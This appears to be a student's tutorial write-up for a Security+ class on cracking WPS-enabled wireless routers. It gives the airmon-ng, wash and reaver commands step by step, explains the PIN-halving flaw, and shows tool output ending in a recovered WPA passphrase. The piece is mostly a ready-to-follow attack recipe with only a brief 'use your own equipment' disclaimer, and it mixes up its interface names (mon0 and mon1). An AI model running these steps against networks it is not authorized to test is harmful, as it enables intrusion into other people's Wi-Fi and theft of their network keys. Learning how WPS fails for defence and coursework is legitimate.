This is a Write up I did for my Security + Class on Attacking WPS on newer Wireless routers, If you do anything in this tutorial I would suggest using your own equipment as i don’t condone Hacking

Basis of Cracking WPS enabled Router,

Start Monitor mode on Wireless Card,

sudo airmon-ng start wlan0

This creates a monitoring interface call ‘mon0′, needed for later

now to scan for WPS enabled Routers we need a program call wash, this comes with the WPS cracking suite named reaver from version 1.4 and up

sudo wash -i mon0

This may give you the ‘[!] Found packet with bad FCS, skipping…’ error to ignore these execute the command above with -C as in..

sudo wash -i mon0 -C

The -i is for interface here we use mon0

This will in turn grant you all the WPS enable routers, there BSSID(MAC), SSID(Name), Channel, RSSI(signal strength) WPS Version and WPS Locked

I have yet to run into any version above 1.0 and never one that was locked

It looks like this:

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:21:29:CA:DF:A0 11 -34 1.0 No Hack ME

Once we have this information we can move on to starting to crack the Access Point through WPS, jot down the BSSID(MAC)

Now we start with reaver

sudo reaver -i mon1 -b 00:21:29:CA:DF:A0 -vv

here again we will use the -i for interface and mon0, the -b is for BSSID and we place the MAC there so reaver knows what to attack, the -vv is very verbose, it tells us EVERYTHING its doing

At this point reaver will begin to guess pins against

Now before we go further I will explain how reaver ‘guesses’ the pin, a flaw in the WPS design is it can be broken into two peices where the key is eight digits we’ll say 12345670,

The first four can be guessed against the router seperately then the second half there by taking one hundred thousand guesses down to ten thousand for the first half,

The second half is actually only three digits and a checksum digit on the end so the second half only needs to guess one thousand as it will calculate the checksum automagicly, now some router will time out after so many guesses sadly not a well known vender *CoughLINKSYScough*
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:21:29:CA:DF:A0
[+] Switching mon1 to channel 11
[+] Associated with 00:21:29:CA:DF:A0 (ESSID: Hack ME)
[+] Trying pin 02075679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
After guessing for a long time you will eventually get the key and it will look something like this
[+] Trying pin 00000000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 128 seconds
[+] WPS PIN: ’00000000′
[+] WPA PSK: ‘Th1s1550n0Tw0r4hitItsNotFunny’
[+] AP SSID: ‘Hack ME’

First this was cracked in such a short ammount of time because I passed reaver the pin instead of waiting but this is what it looks like when it finds it by it self as well,

The WPA PSK is the WPA 1 or 2 Password, yes reavealed

Enjoy!